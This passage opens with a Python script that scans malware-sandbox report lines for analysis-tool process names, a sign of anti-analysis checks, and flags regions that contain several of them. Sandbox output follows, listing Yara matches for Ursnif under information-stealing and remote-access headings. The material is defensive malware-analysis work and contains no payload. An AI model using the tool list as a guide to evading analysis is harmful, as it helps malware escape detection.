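from collections import defaultdict

# Analysis-tool process names found in the sample, with rough categories.
# The names are from the report; the categories are the editor's.
ANALYSIS_TOOLS = {
    "procmon.exe": "sysinternals",
    "autoruns.exe": "sysinternals",
    "tcpview.exe": "sysinternals",
    "wireshark.exe": "network",
    "cports.exe": "network",
    "ollydbg.exe": "debugger",
    "lordpe.exe": "pe-tools",
    "regshot.exe": "diffing",
    "icesword.exe": "rootkit-detector",
    "avz.exe": "av",
}

# One report line: "Source: <process>, <dump-id> Binary or memory string: <text>"
LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+?),\s+(?P<dump>\S+)\s+Binary or memory string:\s+(?P<text>.*?)\s*$"
)
# Pull "something.exe" tokens out of a string so embedded names are caught too.
EXE_RE = re.compile(r"[\w.-]+\.exe", re.IGNORECASE)

REPORT_LINES = [
    # Lines as listed in the report above.
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: procmon.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: tcpview.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: wireshark.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: avz.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: cports.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: lordpe.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: icesword.exe",
    "Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe",
    "Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: regshot.exe",
    # Constructed noise: a single tool name inside help-style text in another region.
    "Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: Use wireshark.exe or tcpdump to inspect the capture",
    # Constructed: a string with no tool name, and a line that is not a Source: entry.
    "Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred",
    "Yara detected Ursnif",
]


def parse_report_lines(lines):
    """Yield (process, dump_id, text) for each well-formed report line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("proc"), m.group("dump"), m.group("text")


def tool_hits_by_region(lines):
    """Map (process, dump_id) to the set of known tool names seen in that region."""
    hits = defaultdict(set)
    for proc, dump, text in parse_report_lines(lines):
        for token in EXE_RE.findall(text):
            name = token.lower()
            if name in ANALYSIS_TOOLS:
                hits[(proc, dump)].add(name)
    return dict(hits)


def category_profile(names):
    """Count tool names per category, e.g. {'sysinternals': 2, 'network': 2, ...}."""
    profile = defaultdict(int)
    for name in names:
        profile[ANALYSIS_TOOLS[name]] += 1
    return dict(profile)


def flag_regions(lines, min_distinct=3):
    """Return regions with at least min_distinct different tool names; lone hits are ignored."""
    flagged = {}
    for region, names in tool_hits_by_region(lines).items():
        if len(names) >= min_distinct:
            flagged[region] = {"tools": sorted(names), "categories": category_profile(names)}
    return flagged


if __name__ == "__main__":
    for region, detail in flag_regions(REPORT_LINES).items():
        print(region, detail)
```

With the default threshold the constructed help-text region, which contains only wireshark.exe, and the region holding only autoruns.exe both drop out, while the AD000 region with nine distinct names is reported together with its category mix. The threshold is the tunable that trades false positives from documentation strings against missed checks in samples that only probe two or three tools.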

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY